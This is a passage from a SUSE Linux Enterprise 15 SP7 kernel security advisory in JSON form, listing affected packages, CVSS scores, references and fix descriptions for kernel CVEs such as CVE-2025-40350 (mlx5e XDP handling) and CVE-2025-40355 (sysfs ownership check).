"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-40328"
},
{
"cve": "CVE-2025-40350",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40350"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/mlx5e: RX, Fix generating skb from non-linear xdp_buff for striding RQ\n\nXDP programs can change the layout of an xdp_buff through\nbpf_xdp_adjust_tail() and bpf_xdp_adjust_head(). Therefore, the driver\ncannot assume the size of the linear data area nor fragments. Fix the\nbug in mlx5 by generating skb according to xdp_buff after XDP programs\nrun.\n\nCurrently, when handling multi-buf XDP, the mlx5 driver assumes the\nlayout of an xdp_buff to be unchanged. That is, the linear data area\ncontinues to be empty and fragments remain the same. This may cause\nthe driver to generate erroneous skb or triggering a kernel\nwarning. When an XDP program added linear data through\nbpf_xdp_adjust_head(), the linear data will be ignored as\nmlx5e_build_linear_skb() builds an skb without linear data and then\npull data from fragments to fill the linear data area. When an XDP\nprogram has shrunk the non-linear data through bpf_xdp_adjust_tail(),\nthe delta passed to __pskb_pull_tail() may exceed the actual nonlinear\ndata size and trigger the BUG_ON in it.\n\nTo fix the issue, first record the original number of fragments. If the\nnumber of fragments changes after the XDP program runs, rewind the end\nfragment pointer by the difference and recalculate the truesize. Then,\nbuild the skb with the linear data area matching the xdp_buff. Finally,\nonly pull data in if there is non-linear data and fill the linear part\nup to 256 bytes.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40350",
"url": "https://www.suse.com/security/cve/CVE-2025-40350"
},
{
"category": "external",
"summary": "SUSE Bug 1255260 for CVE-2025-40350",
"url": "https://bugzilla.suse.com/1255260"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-40350"
},
{
"cve": "CVE-2025-40355",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40355"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsysfs: check visibility before changing group attribute ownership\n\nSince commit 0c17270f9b92 (\"net: sysfs: Implement is_visible for\nphys_(port_id, port_name, switch_id)\"), __dev_change_net_namespace() can\nhit WARN_ON() when trying to change owner of a file that isn\u0027t visible.\nSee the trace below:\n\n WARNING: CPU: 6 PID: 2938 at net/core/dev.c:12410 __dev_change_net_namespace+0xb89/0xc30\n CPU: 6 UID: 0 PID: 2938 Comm: incusd Not tainted 6.17.1-1-mainline #1 PREEMPT(full) 4b783b4a638669fb644857f484487d17cb45ed1f\n Hardware name: Framework Laptop 13 (AMD Ryzen 7040Series)/FRANMDCP07, BIOS 03.07 02/19/2025\n RIP: 0010:__dev_change_net_namespace+0xb89/0xc30\n [...]\n Call Trace:\n \u003cTASK\u003e\n ? if6_seq_show+0x30/0x50\n do_setlink.isra.0+0xc7/0x1270\n ? __nla_validate_parse+0x5c/0xcc0\n ? security_capable+0x94/0x1a0\n rtnl_newlink+0x858/0xc20\n ? update_curr+0x8e/0x1c0\n ? update_entity_lag+0x71/0x80\n ? sched_balance_newidle+0x358/0x450\n ? psi_task_switch+0x113/0x2a0\n ? __pfx_rtnl_newlink+0x10/0x10\n rtnetlink_rcv_msg+0x346/0x3e0\n ? sched_clock+0x10/0x30\n ? __pfx_rtnetlink_rcv_msg+0x10/0x10\n netlink_rcv_skb+0x59/0x110\n netlink_unicast+0x285/0x3c0\n ? __alloc_skb+0xdb/0x1a0\n netlink_sendmsg+0x20d/0x430\n ____sys_sendmsg+0x39f/0x3d0\n ? import_iovec+0x2f/0x40\n ___sys_sendmsg+0x99/0xe0\n __sys_sendmsg+0x8a/0xf0\n do_syscall_64+0x81/0x970\n ? __sys_bind+0xe3/0x110\n ? syscall_exit_work+0x143/0x1b0\n ? do_syscall_64+0x244/0x970\n ? sock_alloc_file+0x63/0xc0\n ? syscall_exit_work+0x143/0x1b0\n ? do_syscall_64+0x244/0x970\n ? alloc_fd+0x12e/0x190\n ? put_unused_fd+0x2a/0x70\n ? 